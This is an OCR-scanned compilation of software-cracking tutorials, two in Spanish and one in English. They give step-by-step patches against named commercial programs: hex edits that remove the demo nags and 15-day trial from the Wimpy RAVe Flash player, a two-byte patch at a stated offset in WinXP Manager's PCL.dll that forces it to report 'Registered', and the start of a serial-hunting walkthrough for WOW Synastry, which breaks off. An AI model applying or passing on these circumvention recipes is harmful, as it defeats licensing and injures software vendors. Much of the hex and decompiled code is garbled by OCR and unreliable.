0000016 1B_3F ?C:CF 30 .€3 0C AB EC 23 02 8A A0 A2 88 2C| .2]104.«<iX*.I el. 
D0000032 382 82 02 8A A2 22 8A 80 80 62 6E AC C3 A2 CO 10 | [1 .le"Ilibn-¿cA. 


A A A 
D0000064 69 BD 64 A! 94 SB 


ixj*eRÚnj*niTM21[ 
0000080 A5 59 24 E! FD SE | FY*ól=I=Icladés_ 


00000096 |DE F? 5D FH Beginning: FB 77 | A-=]yemic9I0I>iúw 
00000112 |2F E? 50 Ol | 3 <[ Beginning of bloc +] OD E4 | -CP.0..6%AC' .e.3 
00000128 |9F 74 FS B: End: E9 00| 1t5*'0i1.-.9«1.é. 
00000144 2A 98 AF 7: | h10390 <JEnd of block +] 70 5A| * 2)0011UIgá pz 
00000160 |75 56 ES AI . B3 54 | uVá01VY/0>9)34_>T 
00000176 173 40 E3 AI Tn all open files F6 77 | =03010] )Fúlviów 
00000192 6D SA F3 0: 5 75 3A | mló.cuixIi3tóuúuu: 
00000208 |FD 5D FA FE; OK 5D 7E| $]ú:595..4.M..]* 


Cancel | 


00000224 LAI 
nanan>an FR FE 2E 


75 | ayÓ0sS k.-2-en: lu 
201 AT>ERES -24 Vaz 
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Crackeando aplicaciones SWF “Wimpy RAVe 2.0.7” 
Copiarlo en un nuevo archivo con el nombre “rave2.gz”, 


rad em rave2.gz | 


Difast: | 0 12345062 8 910 11 12 13 14 15] 

00000000 ¡Mes 9C EC BD 09 58 94 55 1B 3F 7C CF 30 C3 0C AB | x115%.X1U.?|104.< 
00000016 ¡EC 23 02 84 A0 A2 88 2C.” 82 82 02 8A A2 22 8A 80 1%.1 ec1.11.15"11 
00000032 |80 62 6E AC C3 A2 CO 10 0C B8 ES EB 54 54 68 86 | Ibn-Ac4...,¿eTZhI 
00000048 BD 2D 94 99 65 9A 95 B6 69 BD 64 AS E6 52 DA 6E | %X-IMelIixj*e*RÚn 
00000064 |6A B9 94 69 B6 BA 94 5B_ A5 59 2A F3 9D 73 9EF 73.) 3*11121[FYx*ól=SI= 


Abrimos “Phytonr” y escribimos el siguiente escript. 


PythonWin 


File Edit View Tools Window Help 


EE AA E: 


DS RA Roo ¿ABN? 


PythonWin 2.5 (r26:66714, Nov 11 2008, 10:21:19) [MSC v.1500 32 bit (Intel)] on win32. 
Portions Copyright 1994-2008 Mark Harnrmmond - see 'Help/About PythonWWin' for further copyright 
information. 

>>> import zlib 

b>> a=open("k:1jescritorio!|ejemplo!|rave2.gz","rb") read () 

>>> b=zlib.decompress (a) 

>>> c=open("k:|lescritorio!|ejemplo!|rave2_d","wb") 

>>> Cc.vrite(b) 

>>> c.close() 


Ahí al terminar el tenemos como salida “rave2.d”, si lo abrimos con hex vemos lo 
siguiente: 


mor 
«ray e. swf 


_ Offset [01234567 89A4BCDEF  ____ 
00000000 |43 57 53 08 5E 40 04 00 CUS.“0. .x11%.XIU 


00000010 21104. «i4.1 el. 
00000020 11.19" II Ibnrdcd. 


Offset | 01234567 89ABCDE EF! 
00000000 | 


| x11%.X1U.?]101.< 
00000010 | 14.1 51,11.15"11 
00000020 OC B8 E5 EB 54 54 68 86 Ibn-AcA.. ¿8TZhI 


Offset 81 33456%009048€.bES 


00000000 70 00 04 FO 00 00 BS 40 00 18 10 00 44 11 00 00 p..5..p0....D... 
00000010 00 00 43 02 97 94 A3 C1 3F 02 00 06 FF 12 A8 43 ..C.pIfá?...y.“C 


00000020 /00 00 01 00 84 01 09 54 65 6E 61 63 69 74 79 MO ....I..Tenacity. 
Page 1 of 5805 Offset: 2F | 
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Crackeando aplicaciones SWF “Wimpy RAVe 2.0.7” 

Como vemos en “rave2_d” le falta los 8 bytes, que identifican al archivo *.swf, 

Lo que hacemos para completar la descompresión, es copiar los 8bytes de “rave” y lo 
añadimos a “rave2_d”(aquí voy a hacer una copia de “rave2_d” con el nombre de 
“rave2_d f” para que vean la diferencia.) 


Como vimos anteriormente los 3 primeros bytes indican el estado. 


43 57 53 es comprimido CwS 
46 57 53 es descomprimido FWS 


mr 
“raye.swÍ 


Of fset 001234567 839ABCODEF 


00000000 (43 57 53 08 5E 40 04 00](78 9C EC BD 09 58 94 55] CUS.“0. .x1i%.XJU 
00000010 | (1B_3F 7C CF 3003 0C AB) EC 23 02 84 AD A2 88 20 | .?] 10%. «it .1 ol. 
00000020 || 82 82 02 8A A2 22 8A 80 80 62 6E AC C3 A2 CO 20, 1.19" IIIbn-ÁcA. 


AraveZ.gz pr 
Md: E 89 ABCDEF 


Offset 

00000000 | [78 9C EC BD 03 58 94 55] E [1B_3F 7C CF 30 C3 0C AB] AB] li qu? | 10h. 
00000010 ||EC 23 02 84 AD A2 88 2C 82 82 02 BA A2 22 84 80 38.1 01.11. 10"11 
00000020 | 80 62 6E AC C3 A2 CO 10 0C B8 ES EB 54 5A 68 86 | Ibn-AcA..,á6TZhI 


_ Offset || EFEETEIEXEEEZRA E al 

00000000 | (70 00 04 FO 00 00 BS 40)(00 18 10 00 44 11 00 00) p..3..y0....D. 
00000010 Ueirsrara 00 43 02 97 94 A3 C1 3F 02 00 06 FF 12 A8 A ¿CoMISA?.. $ "O 
00000020 | 00 00 01 00 84 01 09 54 65 6E 61 63 69 74 79 00 ....I..Tenacity. 


ravez df 
Offset 


E ES E E E E A O 


00000000%[46 57 53 08 5E 40 04 00)(70 00 04 FO 00 00 ES 40] EWS."0..p..3..y0 
oooo0010 [00 18 10 00 44 11 00 00) 00 00 43 02 97 9 A43C1 ....D..... C.IILÁ 
00000020 3F 02 00 06 FF 12 A8 43 00 00 01 00 84 01 09 54 ?...$."C....1..T 
Page 1 of 5805 Dffset: 0 =70 | Block: n/a | Size: 


Aquí ya esta listo el trabajo de descomprimir, lo unico que nos queda es modificar la 
extencion de “rave2_d _f”a“rave2_ d f.swf”. 


3. Quitar la molesta nag “mensaje DEMO” y “EXPIRED” 


Para este punto usamos abrimos, tenemos 2 posiblidades, que nuestro nag llamado “DEMO” sea una 


imagen o texto. 
¡q€_-í-_ _ __AXAT104160 
DEMO 


Abrimos con “Sothink SWF decompiler” nuestro “rave2_d_f.swf” 
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Crackeando aplicaciones SWF “Wimpy RAVe 2.0.7” 


Primera opción buscar imagen que diga demo.- Buscamos en Shape si encontramos alguno para 
atarcar por ahí, pero no tenemos éxito. 


Resources 


EDO Font (4) 
OJO Text (15) 
2-0 Sprite (196) 
EJ Button (26) 

: “P]E-] Frame (28) 
001 Action (86) 
EJ) Misc Tags (3) 


Segunda opción buscar texto diga DEMO.- Buscamos en Text si encontramos alguno para atarcar por 
ahí, no tenemos éxito pero hallamos este “demoText”, es un principio. 
Si vamos al hex. Y buscamos esa frase “demo”tenemos varias coincidencias. 


Resources Xx 
Tag Information ; 


/, Esport FLA, Expor 


Value 


Property 


Tag Type DefineEditText(37) E 4 rave2_d_f.swf a 
1] Shape (90) 
+]. Font (4) 
EJ. Text (15) 
(20,85, -2)[53,95 x 15,9] JA text 4 
Initial Text <p align="center"></p> A text 12 
Veriable Name demoText = 
Using Font ArialíFont3) A text 35 
Using Font Height 200 [A text 37 
Text Color ABGR(FFODODOD) [JA text 39 
Left Margin 0 PA axh de 


En la sección Sprite buscamos quien llama a “text 40”, y encontramos que es el “Sprite 41” 


Tag Information E El sprite 31 
Layer Character Name Position Transform 
1 sprite3l  bkad 0.0,0.0  Scale[0.559, 0,229] Rotate[0.0, -0.0] Ol frame 1 
] ¡Ol Frame 2 
¡0% Frame 3 
frame 4 


: rar 


1era.- a primera vista no se ve pero, aqui se asigna el texto “DEMO” podriamos reemplazarlo por ceros pero 
el problema persiste, claro que sin la palabra, curiosamente “68, 69, 77, 79” es nuestra palabra “DEMO” y 
también la palabra “EXPIRED” como 69, 88, 80, 73, 82, 69, 68 


00005F70 0036 38: 20 36 39.20 37 68,697 
00005F80 3171 26 3 29 00 45 78 70 Me Exp 
00005F90 00 .36::39 26. 38. 39. 2C 389. 30.2C.-37 33.26 30-32 20 «69,88+80, 13,82; 
00005FAO 36 39 2C 36 38 00 69,68. 
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Crackeando aplicaciones SWF “Wimpy RAVe 2.0.7” 


2da Encontramos algo curioso “infoWindowShowDemo” que ejecuta nuestro texto “DEMO” e 
“infoWindowShowExp” que ejecura el texto “EXPIRED”, si cancelamos ambas acabaria nuestro problema 
de nags; pero no funciona correctamente, entonces solo cancelo “infoWindowShowExp” . 


00007B00 65 73 00 es. 
00007B10 00 72 65 67 5F 74 72 69 61 6C 5F .reg_trial_ 


00007B20 6F 76 65 72 00 74 72 69 61 6C 5F 6F 76 65 72 00 over.trial_over. 


00007B30 
00007B40 00 44 61 74 65 00 67 65 74 54 69 6D 65 00 73 .Date.getTime.s 


00007B50 6F 5F 77 69 6D 70 79 52 00 64 61 74 61 00 72 74 o_wimpyR.data.rt 
00007B60 69 00 62 6F 62 37 38 37 i.bob787 


Queda asi 


00007B00 65 73 00 es. 
00007B10 00 72 65 67 5F 74 72 69 61 6C 5F .reg_trial_ 


00007B20 6F 76 65 72 00 74 72 69 61 6C 5F 6F 76 65 72 00 over.trial_over. 


o O 
00007B40 44 61 74 65 00 67 65 74 54 69 6D 65 00 73 . Date.getTime.s 
00007B50 6F 5F 77 69 6D 70 79 52 00 64 61 74 61 00 72 74 o_wimpyR.data.rt 
00007B60 69 00 62 6F 62 37 38 37 i.bob787 


Y la salida visual seria estas sin nags, pero ahí aun no termina la cosa por que aun nos queda el trial de 15 
días que aun molesta y no permite que usemos la aplicación. 


[0 [https /Juwww.tknotas,ath,cxf Y” á 


* E) Forms" Ml Images” (0) Information” | Miscellaneous” / Outline” € Y Resizer 7 Tools” La] view Source”? Opti 


¿Dgma.... |] Radio OnLine - tknotas.ath.cx E | 


¡e 


3ra_aquí vemos la declaración de ambas variables. 


00009B90 57 69 6E 64 6F 77 00 65 78 70 00 64 65 6D 6F 54 


00009BAO0 65 78 74 00 65 78 70 5F 
Y 


00009D10 74 00 6C 69 6E 6B 6C 6F 63 6B 42 75 79 00 64 65 t.linklockBuy.de 


00009020  6D"6E"546578"74 457870 00 69 73 45 75 6C 6  mOTextExp.isNull 


4ta.- aquí se le asigna al texto “DEMO” el formato, la alineación pero si nos fijamos en la imagen de abajo 
es nuestro “text 40” 


00011FDO 00 00 00 00 00 00 00 00 64 65 6D 6F 54 65 78 74  ........ demoText 
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Window.exp. demoT 


.exp_ 


Crackeando aplicaciones SWF “Wimpy RAVe 2.0.7” 


00011FEO 00 3C 70 20 61 6C 69 67 6É 3D 22 63 65 6E 74 65 .<p align="cente 
00011FF0 72 22 3E 3C 2F 70 3E 00 r"></p>. 


5ta otras sin importancia. 
000009B9B 
00001DB3A 


Hasta aquí ya cumplimos con el objetivo de quitar las nags. 


4, Quitar el periodo de prueba 


Como vemos hay variables o funciones con los nombres “demoText” y “demoTextExp” lo cual nos lleva a 
sospechar que hay una función dentro de su script que se encargar de controlar el trial. 


Si recordamos la sección modificada, ...... hum vemos “reg_trial_over” ese parecer nuestro objetivo, pero a 
diferencia de las nag no podemos eliminarlo ya que generaría algunos inconvenientes por tratarse de una 
función. 


00007B00 65 73 00 69 6E 66 6F 57 69 GE 64 6F 77 53 68 6F  es.infoWindowSho 
00007B10 77 44 65 6D 6F 00 12065675574 7269 61 6C"5FE  wDemo.reg_trial_ 
00007B20  6F 76 65 72 00 74 72 69 61 6C 5F 6F 76 65 72 00  over.trial_over. 
00007830 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..coccccocccoo.... 
00007B40 00 00 44 61 74 65 00 67 65 74 54 69 6D 65 00 73  ..Date.getTime.s 
00007B50  6F 5F 77 69 6D 70 79 52 00 64 61 74 61 00 72 74 o _wimpyR.data.rt 
00007B60 69 00 62 6F 62 37 38 37 


Lo vemos mas claramente en el decompilador, parece ser la parte mas difícil del tute pero en realidad es la 
mas simple. Solo buscamos algo que coincida dentro de los scripts “Action” en la sección de cargado 
“MainMovie” buscando.... Eureka... hallado justamente hay una funcion “reg_trial_over()” con 3 
parametros de retorno y solo es un logico, verdadero o falso... ahí atacamos. 


452 ) ¿7 end if Resources 


453 return (_locl.UL()): A EOS 
454 y £f End of the function 

455 function reg_trial over() ( 

456 if (!(1448483791 € -1448483792)) £ 

457 var _locl = UL.UL.UL; +16 sprite 6 
453 y ¿7 end if 6-7 É3) sprite 8 
459 UL = _locl; + 08 sprite 23 
460 if (UL(_loc1)) 4 +-08 sprite 24 
461 UL.0L. UL. = 0L(): e- (63) sprite 41 
4 UL. UL () | 2-05 sprite 43 
463 UL = NULL; AE 

464 return (false); + kz je se 
pS Ls £ + = sprite 53 
467 UL = _locl; 5 — pS 
468 if (! (1137503192 € -1137503193)) / + E pesos 
469 _locl = UL() - _locl; naa sprite 77 
470 y 4/ end if A — oo 
4 if (_locl > UL) ( Eel-[ 165 sprite 82 
472 return (true): E as po 
473 y + Sl sprite 
474 else ( + E sprite 91 
475 return (false): + al sprite 99 
476 y ¿7 end else if 6-63) sprite 100 
477 , ¿£f end else if E] Es] sprite 1083 
473 y ¿7 End of the function 
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Crackeando aplicaciones SWF “Wimpy RAVe 2.0.7” 
1era interpretando el script 


Tomamos la función y la convierto a algo mas comprensible. 


Local1l.- es la variable que almacena el conteo de los días. 
Local2.- es la variable estática que almacena los 15 días. 
Mientras esta función retorne false la aplicación seguirá en uso. 


function reg_trial_over() ( 
if (! (1448483791 € -1448483792)) ( 
local1l = varible; 
y // end if 
local2 = locall; 
if (funcionX(locall1)) ( 
varible = funcionX(); 
local2.FuncionX(); 
local2 = NULL; 
return (false); ler return 
) 
else ( 
local2 = locall; 
if (!(1137503192 € -1137503193)) ( 
local1 = funcionX() - locall; 
y) // end if 


) 
else ( 
return (false); 3er return 
) // end else if 
) // end else if 
) // End of the function 


Entonces cambiamos ese valor de true a false; para cambiarlo nada menos que vamos la hex. 
Y ubicamos esa sección. 


00007120 00 72 65 67 5F 74 72 69 61 6C 5F 6F 76 65 72 00  .reg_trial_over. 
00007130 00 00 02 2A 00 E4 00 96 02 00 08 OA 1C 96 0A 00  ...*.d.—..... =.. 
00007140 07 CF 1B 56 56 07 30 E4 A9A9 60 9D 02 00 10 00  .1.Vv.0á00'l.... 
00007150 96 02 00 08 0B 4E 96 02 00 08 0C 4E 87 01 00 01. -....N-....Nt... 
00007160 17 96 04 00 08 0D 04 01 1D 96 09 00 04 01 07 01. .—....... a 
00007170 00 00 00 08 OE 3D 12 9D 02 00 4E 00 96 02 00 08  ..... =.l ..N.-... 
00007180  0A 1C 96 02 00 08 0B 4E 96 09 00 08 0C 01 00 00  ..—....No....... 
00007190 00 00 08 OF 3D 4F 96 07 00 01 00 00 00 00 08 0A  ....“O-......... 
000071A0  1C 96 02 00 08 10 52 17 96 04 00 08 0D 08 11 1D .—....Ret....... 
oooo7180 PM 3 96 05 00 07 93 0C 8B 62 4C 62  -....>-...“.<bLb 
000071C0 9D 02 00 13 00 99 02 00 51 00 96 04 00 08 0D 04 l....*..Q.-..... 
000071D0 01 1D 96 07 00 01 00 00 00 00 08 OF 3D 96 02 00. ..—......... =.. 
00007180 04 01 96 0A 00 07 D8 EB_ CC 43 07 27 14 33 BC 60  ..-...981C.'.34 
0000710 9D 02 00 10 00 0B 87 01 00 01 17 96 04 00 04 01 l..... ela 
00007200 08 12 1C 67 12 9D 02 00 0B 00 5. malrrsr 
00007210 99 02 00 06 00 BARA MMOSAON 3E sE 15 A 
Como queda la aplicación es así. 

00007120 00 72 65 67 5F 74 72 69 61 6C 5F 6F 76 65 72 00  .reg_trial_over. 
00007130 00 00 02 2A 00 E4 00 96 02 00 08 0A 1C 96 0A 00. ...*.d.—..... =.. 
00007140 07 CF 1B 56 56 07 30 E4 A9 A9 60 9D 02 00 10 00  .1.vv.0300'l.... 
00007150 96 02 00 08 0B 4E 96 02 00 08 0C 4E 87 01 00 01. -....N-....Nt... 
00007160 17 96 04 00 08 0D 04 01 1D 96 09 00 04 01 07 01. .—....... aa 
00007170 00 00 00 08 OE 3D 12 9D 02 00 4E 00 96 02 00 08  ..... =.l ..N.-... 
00007180  0A 1C 96 02 00 08 0B 4E 96 09 00 08 0C 01 00 00. ..—....Mu....... 
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Crackeando aplicaciones SWF “Wimpy RAVe 2.0.7” 


00007190 
000071A0 
000071B0 
000071C0 
000071D0 
000071E0 
000071F0 
00007200 
00007210 


00 00 08 OF 3D 4F 96 07 00 01 
1C 96 02 00 08 10 52 17 96 04 
MO 3E 968 05 00 07 
9D 02 00 13 00 99 02 00 51 00 
01 1D 96 07 00 01 00 00 00 00 
04 01 96 OA 00 07 D8 EB_ CC 43 
9D 02 00 10 00 0B 87 01 

08 12 1C 67 12 9D 02 00 

99 02 00 06 00 BERO2NOOOSAOO 


00 
00 


00 
08 
el 
04 
0F 
27 


00 
0D 
8B 
00 
3D 
14 


Lo comprobamos en el decompilador; ahí lo tenemos amigo listo.... 


> Action (86) > 


y ¿f end if 
return (_locl.UL()): 


) 


, 


Y la presentación final es. 


'?£ End of the function 
function reg trial over() 


í 


if (!(14458483791 € -14458483792)) 


war _locl = UL.UL.UL: 

y £/ end if 

UL = _locl: 

if (UL(_locl)) ( 
UL.UL.UL = UL(): 
UL.UL(): 


else ( 
UL 


_locl; 


í 


if (! (1137503192 « -1137503193)) 
UL(j - 


J 


_locl 


' end 


if 


) 2/ end else if 


' End of the function 
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_Jocl; 


í 


Resources 


y: - 


E 


o 


JE 


A 


0 


nr 


L 


E E-4-4-E-4-4-4-4-0-4-2-0-0-4-0-4-0-4-E 


ANAIA] 
'" 


5 


9 


kz 


3 


10 


A 


| 


A 


AAAAANANAANA A 
md gor Ego lg WD) 


(1 


10 


0 


E a id a | 


sprite 3 
sprite 23 
sprite 24 
sprite 41 
sprite 43 
sprite 44 


sprite 60 


Mm mn sm 
== e | 
e His Mie 
Fe ee 
DD 
o | 
N 0 


sprite 100 
sprite 108 
sprite 116 


10 


Crackeando aplicaciones SWF “Wimpy RAVe 2.0.7” 


ME http: /funww,Eknotas.ath.cxf DES 9 ps 


E) Forms” 4% Images” () Information” Miscellaneous? 7 Outline” O y Resize” e Tools” +2) View Source” P Options” 


| | Radio OnLine - tknotas.ath.cx [7 | 


Trabajo concluido. 
Notas finales. 


Nunca pense hacer un tutorial ya que por lo general no las hago. Reitero mis agradecimientos a los 
miembros de la lista por su ayuda y su ánimo, para realizar este material. 
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Cracking With Kurapica 


Using Reflector and Ildasm to Crack WinXP Manager 5.1.2 


(Program can be downloaded from http://www.yamicsoft.com) 


Hi, welcome to a new cracking tutor, our target today is called 
WinXP manager; it's a nice collection of utilities that help 
you tweak your OS. 


Actually cracking targets are still rare and that's why we 
don't see many tutorials on .net cracking, anyway I won't keep 
you long, let's get moving. 


Please make sure you have the following tools before we begin. 


e Reflector : www.aisto.com/roeder/dotnet 
e Ildasm mn installed with Visual studio 
e CFF Explorer : www.NTcore.com 


l.install the target on your PC but before you open it in 
Reflector you must run it to see the kind of protection 
used here, first thing you will see is the nag screen 
telling you that you still have 15 days left and that you 
can still try the software, click "Try it" to start the 
application, after the main window appears you must click 
the "About" button to reach to the registration form, 
Click "Buy and register" and you will be there. 


Purchase and Register WinXP Manager Y5.1.2 


Thank you for your supports 


Purchase Software 


If you have not yet paid the registration fee, you have 15-Day trial. The registration Fee is 
only $39,95, You can click BUY NOW! button to make an online secure purchase, you will 
receive Registration Code right away! 


Upgrades will be FREE for registered users within two years! Buy | 


Enter your name and registration code 


If you paid the registration fee and received a registration code from an authorized reseller 
or company, please enter your name and registration code here EXACTLY as they appear in 
the instructions. 


Your Name ÍKurapica 
Registration Code | L- | i- | A | | Activate 


Yamicsoft Copyright 2003-2006 


As you Can see this is a Cinderella protection, which 
means that you have a name and serial to enter, this leads 
us to cracking this target in two methods, first we Can 
use patching or we Can make a Keygen for it and I will 
explain only patching and leave the Keygen for you. 


2.0k now as I said before the most important thing about 
cracking .net applications and I mean executables here is 
to find the entry point method so that you Can start 
tracing the protection scheme implemented in that target, 
Open the target in Reflector and right click the WinXP 
Manager assembly node and click "Go to entry point", then 
Reflector will redirect you to a Class Called "Load" where 
you will find a method called "Main" ¡in that class, 
clearly this is the starting point for this target so 
double click it to see the disassembly of its code. 


Lutz Roeder's NET Reflector 


OD: 
E +3 WinXP Manager 
SN WinXP Manager.exe 

aj References 

a O - 

(0 WinXP_Manager 

(0 WinXP_Manager.My 

0 WinxXP_Manager.My Resources 
Resources 


3.0ne thing worth mentioning here is that we have no 
protection for this assembly, no obfuscation, no packing, 
and this is as common as a 25 years old virgin, look at 
the disassembly of the method "Main" and analyze it 


carefully to find where the application checks for the 
license. 


Lutz Roeder's NET Reflector 


% frnSysReduce 

% frmSysRepair Process.Start (startInfo) 
%2 frmSBysSecurity ipplication.Exit 

H triSysSpeed ProjectData.Endipp 


End If 
% frriWw'elcome 


$3 ES a Next 
GetProductKey Startup. StartupCondition 


E $ Load publicVarFun.OF = Resources.OpenFolder 
) Base Types publicVarFun.MyXP = Resources.MyTradeLogo_ENG_ 

2 Main() : Void publicVarFun.Line = Resources.Line | 
$ MyCls publicVarFun.MySideBarColor = Conversions.ToString(MyClsReglonfig.Reac 
$ MyClsOther If (Operators.CompareString(publicVarFun.MySideBarColor, "", False) Is 
$ publicVarFun publicVarFun.MySideBarColor = "SystemColors"” 


a End If | 
Startup 
$ bi publicVarFun. RemainDays = MyClsDetermineRegister.DetermineRegistered 
() WinxXP_Manager.My 


If (Operators.CompareStringípublicVarFun.RemainDays, "Registered", Fa 
publicVarFun.IsRegistered = True 

. É Nev frmSplash().Show 

Public Shared Sub Main: Fla 


Declaring Type: WinxP_t New frmOverdue () .Show 
Assembly: WinXP Md. End 1f 
Wersion=E Application.Run 
End Sub 


Nothing is interesting here until we reach this line I 
surrounded with a red rectangle, this line sets a value 
for "RemainDays" which is a string variable, the 
"DetermineRegistered" is a string returning function which 
returns one of two values, either "Registered" or 
"Expired", after that line you see the software comparing 
"RemainDays" with a string and if it's equal then a 
variable called "IsRegistered" is set to true. 


Patching 


here I will use patching, we will make sure that the 
function "DetermineRegistered" always returns 
"Registered", now click the "DetermineRegistered" function 
to see its code. 


$” Lutz Roeder's .NET Reflector Of x] 
| File View Tools Help 


¡090 aio 4 [Visual Basic da 
E DetermineRegisteredí) : Bl Disassembler 
E GetRegCodeYalueú': S = 
gy GetRegCodeValuel : Str Public Shared Function DetermineRegistered() ¿s String Z 
EN GetRegisterCode(String 

2% GetRegNamed : String 

89 Registeredí) Boolean uu 
% WriteRegisterCode(Strincy/ 


» 


7 If MyClsDetermineExpired.IsExpired(15) Then 
Public Shared Function [ MessageBox.Show("Trial escaped, please execute WinXP : 
” 7] mM 
Declaring Type: PCL.MyCl a 
End If 
Assembly: PCL Vers 


Return Conversions.ToString(MyClsDetermineRegister .byteRel 
End Function 


li AM A 
dh 


There is a new Boolean returning function here called 
"Registered" which determines the returned value from this 
function, if we can make function "Registered" always 
return true then this function will always return a 
"Registered" string and that's what we want. 


How to do that? 


One of my previous tutorials discussed inverting Boolean 
returning functions and that's our goal now, we will 
change first two bytes of "Registered" function to make it 
always return true, but first we have to find the file 
offset for the function bytes, 1 explained that in 
previous tutors too but I will do it again here. 


The "Registered" function is not located in the main 
program assembly, if you check Reflector you will find it 
in an assembly called "PCL.dl1", so this is the file we 
will patch, open this file in Ildasm and find the 
"Registered" function node. 


C:AProgram FilesYYamicsoft' WinXP ManageriPCL.DLL - IL DASM 


a--Y CiProgram Files|YamicsoftWinxP Manager|PCL.DLL 
» MANIFEST 
SY ra 
Y Pcl.my 
bo E PCL.DetectWindowsVersion 
bo E PCL.DeterminePassword 
bo JE pal EmptyRecycle 
éb- ME PCL.FileOperate 
é- ME PCL.InstanceRunning 
bo JE POL ListviewioveToNext 
é-ME Pol Module1 
é-ME Pou myclsAccessINI 
é-ME PcL.myclsAccessxML 
e E PCL.MyClsDetermineRegister 
»- class public auto ansi 
e ME MyClsDetermineExpired 
ME mycisEncrypt 
$ ObjRK : private static class [mscorlib]Microsoft, Win32.RegistryKey 
-$ byteRemainDays : private static uints 
Actor: voidt) 
DeleteExprie : void() 
DetermineRegistered : stringí) 
GetRegCodeYalue ; stringí) 
GetRegName : string(ú) 
a ld stringístring, string) 


Make sure you have checked the "Show bytes" option in 
Ildasm and then double click this node to see its code, at 
the beginning of the code listing you will see a line 
telling us about the RVA offset for this function and this 
is what we want to know from Ildasm. 


Method begins at RVA 0x5c84 
Now close Ildasm and open "PCL.dl1" in CFF Explorer, we 


will use the address converter in CFF Explorer to find the 
file offset for this function. 


CFF Explorer Y - [PCL.DLL] 


¿Y b pS | 11005084 
pa e GQ 00005C84 
E [$] File: PCL.DLL 00004C84 


La] Dos Header 

E)-(3] Nt Headers 

[8] File Header 
ea Optional Header 


5 Relocation Directory 
EME) .NET Directory 
[8] MetaData Header 
E MetaData Streams 
E-(El te 
¿y MetaData Tables 
Strings 
+Us 
[E] HGUID 
: *Blob 
| x Editor 


Cool! This leads to the first byte of the method body, now 
move 12 bytes to bypass the header of that function and 
you will be standing at the first byte of the method bytes 
at offset 0x00004C90 


Use CFF Explorer or your favorite hex editor to change 
first 2 bytes here which are 00,28 to 17,2A and that's 
all, Now open the main program again and there is no nag 
screen this time, BTW I included the Keygen code with this 
tutor for those interested. 


THE END 


Greets: UFO-PU55Y, LibX, RETEAM, SnD, ARTeam, Lz0 
This tutor and all other works can be found ( www.reteam.orglboard 


Contact us (QQ ifSeeknDestroy on IRC 
“Kurapica 
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2 [RVLCN] 


[ Proyección ] 

Aprender un poco mas de la generación de seriales 

[ El a realizar ] 

Encontrar el numero de serie para registrarnos 

[ WOW Sinastry] 

The WOW synastry program lets you see how a relationship functions, the energy 
between the two people involved, the areas which may be problematic and the areas 


where each partner is able to help and support the other. 


[Url de Descarga ] 


http://world-of-wisdom.com 
[ Manos a la Obra ] 


Cuando ejecutamos el programa nos muestra una ventana que nos pide registrarnos 


Shareware Notice 


[This is the Shareware version of the World of Wisdom Module "Astrology for 
Lovers". If you want to continue to use this program please purchase a 
license. The trial period is up to 30 days. 


When you register the program, you will be able to make an unlimited number 
of reports. With the shareware version, you may print out one report only. 


This notification will not appear after the registration 


You have 30 days left before shareware version expires 


Contact: | www.world-of-wisdom.com 


| have paid and received a Registration Code How to Register OK 


Intentaremos registrarnos dándole Click en el Boton : | have paid and received a 
Registration code. Se nos muestra una ventana donde nos pide que ingresemos 
nuestros datos 


WOW: Registration 


Astrology for Lovers 
world-ot-wiscom. com 


Name: [THOBAS 


Code: [XXXXXXXXXXX 


Y DK X Cancel 


Al darle en el botón OK se nos muestra una mensaje de que los datos son incorrectos 
WOW:"Authorized Access Checking" (Xx) 


Q Registration code is not correct! Unable to Register! 


Please contact "supportiMworld-of-wisdom,com”, 
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Si ingresamos al programa y vemos en el About nos muestra que: 


About World of Wisdom 


WORLD of WISDOM 


Credits 


Copyright 2000 World of Wisdom Ltd 
All rights reserved. 


Serial Number 
FC52092000w0wLOW 


Cygnet IT Consultants, Pakistan 


CYGNET 


Y en el menú archivo esta el botón de Registrar 


E: Edit Options Settings 


Name Data... 


Print setup... 
Print Chart(s)... 
Print Interpretation... 


k 


Subtide [Adrian: Sun ir 
Solo nos faltaría saber si el programa esta empaquetado o no y saber en que lenguaje 
fue hecho para empezar. Para eso lo analizaremos con el RDG. El cual nos muestra la 
siguiente información 


RDGiPacker Detector vO.6.5 -%) 


Czz2W0W32.EXE | Abrir | 


Borland Delphi v4.0 Compilador 
Nada Detectado 


Posible X. 
Contacto : Al Frente [] 


rl dEl Detector) 


Y Archivo Escaneado en 10.8 Seg. 


Bueno el programa esta hecho en Delphi y para suerte nuestra no esta empaquetado. 


Como no me va bien aun con Delphi, haremos uso del DeDe para averiguar la 
dirección exacta del botón de OK. 


El DeDe nos da la siguiente información. 


Classes Info | Units Info | Forms Procedures | Project | Exports 


Unit Name Class Name TFImRegDlg 

Aboutbox TAboutForm Control: 

aspects TWináspects Events introls 

Compgrap TCompGraph EA [ava Tim 
Eds coa FormCreate 00578710 0011 
DBISAMPw TDBISAMPasswordDialog EEN 
DEr/Dla Triada BiBtnZCiok 00578D3C 0013 
DGRDIALS DesrosDil EditiChange 00578054 0012 
Graphview TwheeVicn Timer Timer DOS7EDF4 0012 
NameDlg? TNameDl Edi2Change DOS78E3C 0012 
Prev Tre dl Edit2KeyDown DOS578ECO 0013 
a AO _PROC_005788EC D0578SEC — FFFF 
RegDlg TFmPieaDla —PROC_00578C48 00578048 FFFF 
Splash TSplashForm —PROC_00578F18 D0578F18 FFFF 
ds PROC_00578F48 00578F48 — FFFF 
Swmsg TFIimSwsg 


Ahí esta la dirección de nuestro botón OK, en la dirección 00578CFO0. Ahora bien como 
sabemos que es el botón de Ok? 
Bueno el DeDe nos lo aclara bien 


A NN 


Classes Info | Units Info Forms Procedures Project | Exports 


| Class Name [offs | 


TAboutForm 001FE884 AutoSize = False 

TátlasDlg 001FFD18 Caption = Version: 
TComplraph DO204BA0 Font.Charset = ANSI_CHARSET 
TDBISAMPasswordDi... 00205598 Font.Color = clNavy 
TDegreeDial 00205968 Font.Height =-13 
TEMGraph 00206344 Font.Name ='MS Sans Serif 
TExtDlg 00206E00 Font.Style = [fsBold] 
TFormTips 00207424 ParentFont = False 
Tfiminterp 002087E8 pe = False 

Tfimblessage 0020B9FC E E AE 
TFimiegDlg 00208D50 an 
TFimSwMsg 00200028 LA 

Tinterpwin 0020680 Top =149 

TLoginD ialog 002158F4 Width =120 

TMainForm 00215D68 Heiaht = 26 

TNameDlg D02EC77C p 

TOrbisDlg DO2EFDSC Enabled = False 

TPageDlg 002F0590 Font.Charset = ANSI_CHARSET 
TPasswordDialog D002F2044 Font.Color = clWindowText 
TPlanetswiin DO2F4C78 Font Height = -11 ; 
TPreview D02F51F0 Font.Name ='MS Sans Serif' 
